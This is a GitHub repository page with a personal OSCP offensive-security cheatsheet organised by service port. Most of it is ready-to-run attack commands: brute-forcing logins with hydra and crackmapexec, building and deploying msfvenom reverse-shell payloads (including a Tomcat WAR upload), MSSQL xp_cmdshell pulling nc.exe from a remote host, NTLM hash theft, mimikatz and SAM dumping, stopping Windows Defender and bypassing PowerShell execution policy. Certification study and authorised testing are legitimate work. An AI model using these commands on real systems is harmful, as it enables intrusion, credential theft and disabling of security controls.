Skip to content

sysadmon/offensive-security-practices-cheatsheet

BranchesTags
 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits
README.md
README.md
 
 

Repository files navigation

OSCP personal cheatsheet

Enumeration

nmap -sn -v /CIDR nmapAutomator All autorecon /CIDR

NMAP

TCP

sudo -sS -sC -sV -oA .tcp -v

UDP

sudo -sU -sS -sC -sV -oA .udp -v

FTP - 21

Brute force

hydra -V -f -L <USERS_LIST> -P <PASSWORDS_LIST> ftp:// -u -vV

Downloading file

ftp {IP}

PASSIVE

BINARY

get {FILE}

Uploading file

ftp {IP}

PASSIVE

BINARY

put {FILE}

SSH - 22

** Brute force

hydra -V -f -L <USERS_LIST> -P <PASSWORDS_LIST> ssh:// -u -vV

DNS - 53

dnsenum dnsrecon -d

Zone transfert

dnsrecon -d -a dig axfr @ns1.test.com

DNS brute force

FINGER - 79

User enumeration

finger @ finger @

Command execution

finger "|/bin/id@" finger "|/bin/ls -a /"

HTTP - HTTPS - 80 - 443

Automatic scanners

nikto -h python crawleet.py -u -b -d 3 -e jpg,png,css -f -m -s -x php,txt -y --threads 20

Wordpress

Scan

wpscan --rua -e --url

Brute force user(s)

wpscan --rua --url -P <PASSWORDS_LIST> -U ","

Tomcat

Default credentials

The most interesting path of Tomcat is /manager/html, inside that path you can upload and deploy war files (execute code). But this path is protected by basic HTTP auth, the most common credentials are :

admin:admin tomcat:tomcat admin: admin:s3cr3t tomcat:s3cr3t admin:tomcat

Brute force

hydra -L <USERS_LIST> -P <PASSWORDS_LIST> -f http-get /manager/html -vV -u

Tomcat panel RCE

Generate payload **

msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.war

Upload payload **

Tomcat6 :

wget 'http://:@:8080/manager/deploy?war=file:shell.war&path=/shell' -O -

Tomcat7 and above :

curl -v -u : -T shell.war 'http://:8080/manager/text/deploy?path=/shellh&update=true'

Listener **

nc -lvp

Execute payload **

curl http://:8080/shell/

POP3 - 110

Brute force

hydra -l -P <PASSWORDS_LIST> -f pop3 -V hydra -S -v -l -P <PASSWORDS_LIST> -s 995 -f pop3 -V

Read mail

telnet 110

USER PASS LIST RETR <MAIL_NUMBER> QUIT

SNMP - 161

Brute force community string

onesixtyone -c /home/liodeus/wordlist/SecLists/Discovery/SNMP/common-snmp-community-strings-onesixtyone.txt snmpbulkwalk -c <COMMUNITY_STRING> -v snmp-check

LDAP - 389

Scans

nmap -n -sV --script "ldap* and not brute"

ldapsearch -h -x -s base ldapsearch -h -x -D '<USER>' -w '' -b "DC=<1_SUBDOMAIN>,DC="

SMB - 445

Version if nmap didn´t detect it

sudo ngrep -i -d 's.?a.?m.?b.?a.*[[:digit:]]' port 139 smbclient -L

Scan for vulnerability

nmap -p139,445 --script "smb-vuln-* and not(smb-vuln-regsvc-dos)" --script-args smb-vuln-cve-2017-7494.check-version,unsafe=1

If :

  • MS17-010 - EternalBlue
  • MS08-067 - MS08-067
  • CVE-2017-7494 - CVE-2017-7494

Manual testing

smbmap -H smbmap -u '' -p '' -H smbmap -u 'guest' -p '' -H smbmap -u '' -p '' -H -R

crackmapexec smb crackmapexec smb -u '' -p '' crackmapexec smb -u 'guest' -p '' crackmapexec smb -u '' -p '' --shares

enum4linux -a

smbclient --no-pass -L //$IP smbclient ///

Download all files from a directory recursively

smbclient /// -U -c "prompt OFF;recurse ON;mget *"

Brute force

crackmapexec smb -u <USERS_LIST> -p <PASSWORDS_LIST> hydra -V -f -L <USERS_LIST> -P <PASSWORDS_LIST> smb:// -u -vV

Mount a SMB share

mkdir /tmp/share sudo mount -t cifs /// /tmp/share sudo mount -t cifs -o 'username=,password='/// /tmp/share

smbclient /// smbclient /// -U

Get a shell

psexec.py /:@ psexec.py /@ -hashes :

wmiexec.py /:@ wmiexec.py /@ -hashes :

smbexec.py /:@ smbexec.py /@ -hashes :

atexec.py /:@ atexec.py /@ -hashes :

Check if vulnerable

python eternal_checker.py

MSSQL - 1433

Brute force

hydra -L <USERS_LIST> -P <PASSWORDS_LIST> mssql -vV -I -u

Having credentials

mssqlclient.py -windows-auth /:@ mssqlclient.py :@

Once logged in you can run queries:

SQL> select @@ version;

Steal NTLM hash

sudo smbserver.py -smb2support liodeus . SQL> exec master..xp_dirtree '\\liodeus' # Steal the NTLM hash, crack it with john or hashcat

Try to enable code execution

SQL> enable_xp_cmdshell

Execute code

SQL> xp_cmdshell whoami /all SQL> xp_cmdshell certutil.exe -urlcache -split -f http:///nc.exe

NFS - 2049

Show Mountable NFS Shares

showmount -e nmap --script=nfs-showmount -oN mountable_shares

Mount a share

sudo mount -v -t nfs : sudo mount -v -t nfs -o vers=2 :

MYSQL - 3306

Brute force hydra -L <USERS_LIST> -P <PASSWORDS_LIST> mysql -vV -I -u

Extracting MySQL credentials from files

cat /etc/mysql/debian.cnf grep -oaE "[-_.*a-Z0-9]{3,}" /var/lib/mysql/mysql/user.MYD | grep -v "mysql_native_password"

Connect

Local

mysql -u mysql -u -p

Remote

mysql -h -u

RDP - 3389

Brute force

crowbar -b rdp -s /CIDR -u -C <PASSWORDS_LIST> crowbar -b rdp -s /CIDR -U <USERS_LIST> -C <PASSWORDS_LIST>

hydra -f -L <USERS_LIST> -P <PASSWORDS_LIST> rdp:// -u -vV

Connect with known credentials / hash

rdesktop -u rdesktop -d -u -p

xfreerdp /u:[DOMAIN] /p: /v: xfreerdp /u:[DOMAIN] /pth: /v:

Session stealing

Get openned sessions

query user

Access to the selected

tscon /dest:

Adding user to RDP group (Windows)

net localgroup "Remote Desktop Users" /add

WINRM - 5985 - 5986

Brute force

crackmapexec winrm -u <USERS_LIST> -p <PASSWORDS_LIST>

Connecting

evil-winrm -i -u -p evil-winrm -i -u -H

HASHES

Windows

reg save HKLM\SAM c:\SAM reg save HKLM\System c:\System

samdump2 System SAM > hashes

Linux

unshadow passwd shadow > hashes

MIMIKATZ

privilege::debug sekurlsa::logonpasswords sekurlsa::tickets /export

kerberos::list /export

vault::cred vault::list

lsadump::sam lsadump::secrets lsadump::cache

MSFVENOM PAYLOAD

Linux

msfvenom -p linux/x86/shell_reverse_tcp LHOST= LPORT= -f elf > shell.elf

Windows

msfvenom -p windows/shell_reverse_tcp LHOST= LPORT= -f exe > shell.exe

Python

msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw > shell.py

Bash

msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > shell.sh

Perl

msfvenom -p cmd/unix/reverse_perl LHOST= LPORT= -f raw > shell.pl

Listener

Metasploit

use exploit/multi/handler set PAYLOAD set LHOST set LPORT set ExitOnSession false exploit -j -z

Netcat

nc -lvp

PASSWORD CRACKING

Online

Decrypt MD5, SHA1, MySQL, NTLM, SHA256, SHA512 hashes

Hashcat

Linux password

hashcat -m 1800 -a 0 hash.txt rockyou.txt hashcat -m 1800 -a 0 hash.txt rockyou.txt -r OneRuleToRuleThemAll.rule

Windows password

hashcat -m 1000 -a 0 hash.txt rockyou.txt hashcat -m 1000 -a 0 hash.txt rockyou.txt -r OneRuleToRuleThemAll.rule

Others

hashcat --example-hashes | grep -i '<BEGINNING_OF_HASH>'

Rules

John

john --wordlist=<PASSWORDS_LIST> hash.txt

PIVOTING

Sshuttle

sshuttle @ <IP_OF_THE_INTERFACE>/CIDR

Proxychains

ssh -f -N -D 9050 @ proxychains

Interesting link

USEFUL WINDOWS COMMANDS

net config Workstation systeminfo net users

ipconfig /all netstat -ano

schtasks /query /fo LIST /v tasklist /SVC net start

DRIVERQUERY

reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated

dir /s pass == cred == vnc == .config findstr /si password *.xml *.ini *.txt reg query HKLM /f password /t REG_SZ /s reg query HKCU /f password /t REG_SZ /s

Disable windows defender

sc stop WinDefend

Bypass restriction

powershell -nop -ep bypass

List hidden files

dir /a

Find a file

dir /b/s ""

ZIP

fcrackzip -u -D -p '/usr/share/wordlists/rockyou.txt' file.zip

zip2john file.zip > zip.john john --wordlist=<PASSWORDS_LIST> zip.john

About

No description, website, or topics provided.

Resources

Readme
Activity

Stars

0 stars

Watchers

0 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published